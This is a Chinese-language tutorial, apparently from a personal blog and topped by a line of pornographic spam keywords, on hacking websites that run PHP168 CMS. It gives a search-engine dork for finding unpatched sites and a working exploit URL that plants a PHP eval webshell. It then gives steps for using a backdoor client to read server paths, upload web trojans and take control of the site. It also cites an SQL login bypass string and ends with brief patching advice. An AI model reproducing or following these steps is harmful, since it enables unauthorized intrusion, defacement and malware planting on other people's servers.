性色av网站,久久少妇区一区二区三区精品十八禁,性少妇videsexfree片,午夜精品二区久久

本文操作方法十分簡單，按照操作提示一步步來就可以完成了。不少網(wǎng)站在后臺登陸框輸入‘or’'='代碼就可以直接登陸網(wǎng)站后臺，這種方式曾經(jīng)是最流行入侵方式，而今天盧松松講的是如何利用login后臺登陸文件漏洞注入代碼。

login.php（.asp/.aspx）文件一般都是作為CMS系統(tǒng)的管理員后臺登陸文件，這里以PHP168CMS系統(tǒng)為例，login.php漏洞實際上的一個注入漏洞，是利用文件代碼設(shè)計不良直接講惡意代碼直接上傳到網(wǎng)站目錄中。利用此漏洞可以進(jìn)入網(wǎng)站，實行內(nèi)容篡、網(wǎng)頁掛馬等手段。

第一步,尋找使用PHP168CMS的網(wǎng)站

在google中輸入“powered by php168”，然后隨意找到一個網(wǎng)站作為測試，主要是尋找沒有打補(bǔ)丁的網(wǎng)站。然后在域名后面輸入，例：http://www.lusongsong.com/login.php?makehtml=1& chdb[htmlname]=shell.php&chdb[path]=cache&content=& lt;?php%20@eval($_POST[cmd]);?>如果出現(xiàn)了登陸界面就表明漏洞被成功利用。（文中的入侵域名請換成搜索的網(wǎng)站域名）

第二步,讀取網(wǎng)站目錄，獲取網(wǎng)站絕對路徑

如果代碼成功執(zhí)行，木馬就會保存在cache\shell.php文件中，然后下載一個“l(fā)anker微型PHP后門客戶端”，在木馬地址欄輸入 http://www.lusongsong.com/cache/shell.php，然后選擇讀取目錄，如果連接成功就能顯示出網(wǎng)站所在服務(wù)器中的絕對路徑。

第三步,開始上傳PHP網(wǎng)頁木馬

在lanker微型PHP后門的基本功能列表中選擇上傳網(wǎng)頁木馬，上傳的文件會保存在cache目錄中。在域名的后面輸入“cache/網(wǎng)站木馬文件名”就可以運行木馬了，至此已經(jīng)對使用PHP168CMS系統(tǒng)的網(wǎng)站獲得了控制權(quán)，可以任意的修改和刪除。

其實存在login注入漏洞的不止PHP168一家，還有很多不知名的PHP網(wǎng)站源碼都有這個漏洞,如果你使用的是PHP系統(tǒng)，請趕快檢測你的程序是否有這個問題吧。對于PHP語言不了解的站長可以利用PHP注入漏洞掃描工具對你的網(wǎng)站進(jìn)行掃描，例如：CASI、PHP-Mysql注入分析器、 ZBSI等工具。更詳細(xì)方法可以google一下：“如何預(yù)防和檢測網(wǎng)頁掛馬”?；蛘卟榭次覍戇^的關(guān)于網(wǎng)站掛馬文章。